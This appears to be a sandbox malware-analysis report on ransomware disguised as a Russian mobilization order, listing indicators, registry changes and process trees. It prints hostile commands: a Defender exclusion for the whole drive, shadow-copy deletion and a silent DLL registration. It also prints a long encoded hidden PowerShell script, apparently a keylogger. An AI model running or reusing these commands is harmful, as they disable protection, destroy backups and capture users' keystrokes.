796e7fd046d193c74fb478bcd2473379b96b4dc37f85a1e9a1c6024fc0c963ef

Analysis

max time kernel
300s
max time network
294s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
11/05/2023, 08:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Мобилизационное предписание №186-31005-23 от 10.05.2023.exe
Size

437KB
MD5

7143e68ee9d464446312eef1ace05482
SHA1

f397d009ea6cde40dd7e3a501dd37c1547e00638
SHA256

f1cc45caf2b1c60219840f6794ed2d15721cf1a86c96d1f3d4fb822d302c09fc
SHA512

999496ee879121686e042153a0553edf2ac3be8acb0322a24f7e7a2cdc1558302eba61f4aa6a4208bced7c86e01cbdf050df5c4406ee45d14ed30c3845788eed
SSDEEP

6144:LOYGXaPNxdgSdcq2pVZPOJHAbKjyIfd5ZbGdCmHgE5lN:fGqN/XdctpVtkz/fd5ZQgEHN

Score

10^/10

persistence ransomware

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	436	3460	wscript.exe	74
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4408	3460	powershell.exe	74

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 8 IoCs

flow	pid	Process
2	436	wscript.exe
362	436	wscript.exe
363	436	wscript.exe
715	436	wscript.exe
716	436	wscript.exe
1052	436	wscript.exe
1053	436	wscript.exe
1386	436	wscript.exe

Deletes itself 1 IoCs

pid	Process
2860	wscript.exe

Loads dropped DLL 1 IoCs

pid	Process
764	regsvr32.exe

Registers COM server for autorun 1 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\dynwrapx.dll"	regsvr32.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\810424605.pri	taskmgr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4016	vssadmin.exe

Modifies registry class 12 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\WOW6432Node\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\DynamicWrapperX	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\WOW6432Node	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2608	powershell.exe
3716	powershell.exe
3716	powershell.exe
2608	powershell.exe
2608	powershell.exe
3716	powershell.exe
4408	powershell.exe
4408	powershell.exe
4408	powershell.exe
4408	powershell.exe
4408	powershell.exe
4408	powershell.exe
4408	powershell.exe
4408	powershell.exe
4408	powershell.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4956	taskmgr.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2860	wscript.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeBackupPrivilege	4332	vssvc.exe
Token: SeRestorePrivilege	4332	vssvc.exe
Token: SeAuditPrivilege	4332	vssvc.exe
Token: SeDebugPrivilege	4408	powershell.exe
Token: SeDebugPrivilege	4956	taskmgr.exe
Token: SeSystemProfilePrivilege	4956	taskmgr.exe
Token: SeCreateGlobalPrivilege	4956	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe
4956	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4408	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 2452 wrote to memory of 4020	2452	Мобилизационное предписание №186-31005-23 от 10.05.2023.exe	66
PID 2452 wrote to memory of 4020	2452	Мобилизационное предписание №186-31005-23 от 10.05.2023.exe	66
PID 2452 wrote to memory of 4020	2452	Мобилизационное предписание №186-31005-23 от 10.05.2023.exe	66
PID 4020 wrote to memory of 2608	4020	cmd.exe	68
PID 4020 wrote to memory of 2608	4020	cmd.exe	68
PID 4020 wrote to memory of 2608	4020	cmd.exe	68
PID 4020 wrote to memory of 2860	4020	cmd.exe	69
PID 4020 wrote to memory of 2860	4020	cmd.exe	69
PID 4020 wrote to memory of 2860	4020	cmd.exe	69
PID 2860 wrote to memory of 3716	2860	wscript.exe	72
PID 2860 wrote to memory of 3716	2860	wscript.exe	72
PID 2860 wrote to memory of 3716	2860	wscript.exe	72
PID 2860 wrote to memory of 764	2860	wscript.exe	76
PID 2860 wrote to memory of 764	2860	wscript.exe	76
PID 2860 wrote to memory of 764	2860	wscript.exe	76
PID 2860 wrote to memory of 4016	2860	wscript.exe	77
PID 2860 wrote to memory of 4016	2860	wscript.exe	77
PID 2860 wrote to memory of 4016	2860	wscript.exe	77
PID 4408 wrote to memory of 1296	4408	powershell.exe	83
PID 4408 wrote to memory of 1296	4408	powershell.exe	83
PID 1296 wrote to memory of 1616	1296	csc.exe	84
PID 1296 wrote to memory of 1616	1296	csc.exe	84

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Мобилизационное предписание №186-31005-23 от 10.05.2023.exe
"C:\Users\Admin\AppData\Local\Temp\Мобилизационное предписание №186-31005-23 от 10.05.2023.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2452
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 985221155 78 "C:\Users\Admin\AppData\Local\Temp\Мобилизационное предписание №186-31005-23 от 10.05.2023.exe")
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- - C:\Windows\SysWOW64\wscript.exe
    wscript.exe /E:jscript 985221155 78 "C:\Users\Admin\AppData\Local\Temp\Мобилизационное предписание №186-31005-23 от 10.05.2023.exe"
    3⤵
    - Deletes itself
    - Modifies registry class
    - Suspicious behavior: RenamesItself
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3716
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /i /s "C:\Users\Admin\AppData\Local\dynwrapx.dll"
      4⤵
      Loads dropped DLL
      Registers COM server for autorun
      Modifies registry class
      PID:764
  - - C:\Windows\SysWOW64\vssadmin.exe
      "C:\Windows\System32\vssadmin.exe" Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:4016

C:\Windows\SysWOW64\wscript.exe
C:\Windows\SysWOW64\wscript.exe "C:\Users\Admin\AppData\Local\b7769dd90.js" 78
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
PID:436

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGQAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABmADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABoADMAIABqADQAIAA9ACAAbwA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAYwA2ACAAawA3ACAAPQAgAGsAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAZAA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjADEAMAAgAGwAMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAG0AMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAG4AMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGMAMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAG8AMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGgAMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGcAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABvADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYgAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGsAMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABoADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYQAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAG0AMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABhADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAZQAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGsAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABkADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGIAMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAG0AMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGsAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGYAMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGYAMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABqADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGMAMQAwACAAZAAzADUAKQB7AGwAMQAxACAAPQAgAGQAMwA1ADsAZwAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGIAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AGsAMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAGIAMQA5ADsAawAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAXwBfAFUASQBEAF8ARQBOAFYAXwBWAEEAUgBfAF8AIgApADsAaQBmACAAKABrADIANgAgAD0APQAgAG4AdQBsAGwAKQAgAGsAMgA2ACAAPQAgACIAMQAyADMANAA1ADYANwA4ACIAOwBoADIAMQAgAD0AIABrADIANgAgACsAIAAiAGEAIgA7AGEAMgAyACAAPQAgAGsAMgA2ACAAKwAgACIAZAAiADsAbQAyADMAIAA9ACAAawAyADYAIAArACAAIgBzACIAOwBhADIANAAgAD0AIABrADIANgAgACsAIAAiAG0AIgA7AHUAaQBuAHQAIABhADMANgAgAD0AIABPAHAAZQBuAE0AdQB0AGUAeAAoADAAeAAwADAAMQAwADAAMAAwADAALAAgAGYAYQBsAHMAZQAsACAAYQAyADQAKQA7AGkAZgAgACgAYQAzADYAIAAhAD0AIAAwACkAIABFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAAwACkAOwBDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgAHQAcgB1AGUALAAgAGEAMgA0ACkAOwBkADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBpAGYAIAAoAFMAQwBhAHIAZABFAHMAdABhAGIAbABpAHMAaABDAG8AbgB0AGUAeAB0ACgAMgAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgAG8AdQB0ACAAZAAyADcAKQAgACEAPQAgADAAKQAgAGQAMgA3ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AG8AMQA4ACAAPQAgACIAIgA7AG4AMQAzACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAaQBuAHQAIABiADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAbgAxADMAKQA7AGgAMQA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoAGIAMwA3ACAAKwAgADEAKQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABuADEAMwAsACAAaAAxADYALAAgAGIAMwA3ACAAKwAgADEAKQA7AHUAaQBuAHQAIABjADEANAAgAD0AIAAwADsARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABuADEAMwAsACAAcgBlAGYAIABjADEANAApADsAUAByAG8AYwBlAHMAcwAgAG4AMwA4ACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAYwAxADQAKQA7AGkAZgAgACgAbgAzADgAIAAhAD0AIABuAHUAbABsACkAIABlADIANQAgAD0AIABuADMAOAAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7ACAAZQBsAHMAZQAgAGUAMgA1ACAAPQAgACIAIgA7AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAAwACwAIABrADcALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACkAOwBkADkAIAA9ACAAYwAzADkAKABqADQAKQA7AEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFIAdQBuACgAKQA7AFUAbgBoAG8AbwBrAFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABkADkAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABjADMAOQAoAGgAMwAgAGoANAApAHsASQBuAHQAUAB0AHIAIABpADQAMAAgAD0AIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAoAFAAcgBvAGMAZQBzAHMALgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAE0AbwBkAHUAbABlAE4AYQBtAGUAKQA7AHIAZQB0AHUAcgBuACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoADEAMwAsACAAagA0ACwAIABpADQAMAAsACAAMAApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAZAA0ADEAKABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAZwA0ADIALAAgAHMAdAByAGkAbgBnACAAYQA0ADMALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABrADQANAApAHsAdAByAHkAewBzAHQAcgBpAG4AZwAgAGYANAA1AGQAYQB0AGEAXwAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBHAGUAdABWAGEAbAB1AGUAKABrADIAMAAsACAAaAAyADEALAAgACIAIgApAC4AVABvAFMAdAByAGkAbgBnACgAKQA7AGYANAA1AGQAYQB0AGEAXwAgAD0AIABmADQANQBkAGEAdABhAF8AIAArACAARABhAHQAZQBUAGkAbQBlAC4ATgBvAHcAIAArACAAIgAgAFsAIgAgACsAIABnADQAMgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAIgBdACAALQAgACIAIAArACAAYQA0ADMAIAArACAAIgBcAHIAXABuACIAIAArACAAawA0ADQALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXAByAFwAbgBcAHIAXABuACIAOwBSAGUAZwBpAHMAdAByAHkALgBTAGUAdABWAGEAbAB1AGUAKABrADIAMAAsACAAaAAyADEALAAgAGYANAA1AGQAYQB0AGEAXwApADsAfQBjAGEAdABjAGgAIAB7ACAAfQB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGkAbgB0ACAAZwA0ADYAKABJAG4AdABQAHQAcgAgAGQANAA3ACkAewByAGUAdAB1AHIAbgAgAE0AYQByAHMAaABhAGwALgBSAGUAYQBkAEkAbgB0ADMAMgAoAGQANAA3ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABkAGUAbABlAGcAYQB0AGUAIABJAG4AdABQAHQAcgAgAGgAMwAoAGkAbgB0ACAAYQA0ADgALAAgAEkAbgB0AFAAdAByACAAYgA0ADkALAAgAEkAbgB0AFAAdAByACAAZgA1ADAAKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdQBpAG4AdAAgAGMANgAoAEkAbgB0AFAAdAByACAAcABQAGEAcgBhAG0AKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdgBvAGkAZAAgAGMAMQAwACgAKQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAbwA1ACgAaQBuAHQAIABhADQAOAAsACAASQBuAHQAUAB0AHIAIABiADQAOQAsACAASQBuAHQAUAB0AHIAIABmADUAMAApAHsAaQBmACAAKABhADQAOAAgAD4APQAgADAAIAAmACYAIABiADQAOQAgAD0APQAgACgASQBuAHQAUAB0AHIAKQAwAHgAMAAxADAAMAApAHsAaQBuAHQAIABiADUAMQAgAD0AIABnADQANgAoAGYANQAwACkAOwBpAGYAIAAoAGIANQAxACAAPAAgADgAKQAgAHIAZQB0AHUAcgBuACAAQwBhAGwAbABOAGUAeAB0AEgAbwBvAGsARQB4ACgAZAA5ACwAIABhADQAOAAsACAAYgA0ADkALAAgAGYANQAwACkAOwBsADEAMQAoACkAOwBiAG8AbwBsACAAYgA1ADIAIAA9ACAAKABiADUAMQAgAD0APQAgADgAKQA7AGIAbwBvAGwAIABoADUAMwAgAD0AIAAoAGIANQAxACAAPQA9ACAANAA2ACkAOwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAG